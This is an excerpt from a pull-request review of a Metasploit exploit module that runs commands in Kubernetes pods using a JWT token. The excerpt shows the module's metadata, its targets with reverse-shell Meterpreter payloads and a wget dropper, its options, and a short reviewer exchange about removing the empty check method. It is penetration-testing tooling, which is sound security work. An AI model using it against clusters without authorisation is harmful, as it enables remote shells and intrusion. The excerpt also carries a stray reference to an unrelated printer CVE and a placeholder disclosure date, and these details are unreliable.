modules/exploits/multi/kubernetes/exec.rb

```diff
@@ -0,0 +1,321 @@
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'alanfoster',
+          'Spencer McIntyre'
+        ],
+        'References' => [
+          # ['URL', 'https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/']
+        ],
+        'Notes' => {
+          'SideEffects' => [
+            ARTIFACTS_ON_DISK, # the Linux Dropper target uses the command stager which writes to disk
+            CONFIG_CHANGES, # the Kubernetes configuration is changed if a new pod is created
+            IOC_IN_LOGS # a log event is generated if a new pod is created
+          ],
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability' => [ CRASH_SAFE ]
+        },
+        'DefaultOptions' => {
+          'RPORT' => 8443,
+          'SSL' => true
+        },
+        'Targets' => [
+          [
+            'Interactive WebSocket',
+            {
+              'Arch' => ARCH_CMD,
+              'Platform' => 'unix',
+              'Type' => :nix_stream,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/interact'
+              },
+              'Payload' => {
+                'Compat' => {
+                  'PayloadType' => 'cmd_interact',
+                  'ConnectionType' => 'find'
+                }
+              }
+            }
+          ],
+          [
+            'Unix Command',
+            {
+              'Arch' => ARCH_CMD,
+              'Platform' => 'unix',
+              'Type' => :nix_cmd
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Platform' => 'linux',
+              'Type' => :nix_dropper,
+              'DefaultOptions' => {
+                'CMDSTAGER::FLAVOR' => 'wget',
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Python',
+            {
+              'Arch' => [ARCH_PYTHON],
+              'Platform' => 'python',
+              'Type' => :python,
+              'PAYLOAD' => 'python/meterpreter/reverse_tcp'
+            }
+          ]
+        ],
+        'DisclosureDate' => '2000-01-01', # FIXME: find an actual disclosure date
+        'DefaultTarget' => 0,
+        'Platform' => [ 'linux', 'unix' ],
+        'SessionTypes' => [ 'meterpreter' ]
+      )
+    )
+
+    register_options(
+      [
+        Opt::RHOSTS(nil, false),
+        Opt::RPORT(nil, false),
+        Msf::OptInt.new('SESSION', [ false, 'An optional session to use for configuration' ]),
+        OptString.new('TOKEN', [ false, 'The JWT token' ]),
+        OptString.new('POD', [ true, 'The pod name to execute in' ]),
+        OptString.new('NAMESPACE', [ false, 'The Kubernetes namespace', 'default' ]),
+        OptString.new('SHELL', [true, 'The shell to use for execution', 'sh' ]),
+      ]
+    )
+  end
+
+  def check
+    # For the check command
+  end
```

Comment:
Do we need an updated check method / removing this? 👀

Reply:
Since the module is defined with a `ManualRank` I was leaning towards removing this altogether.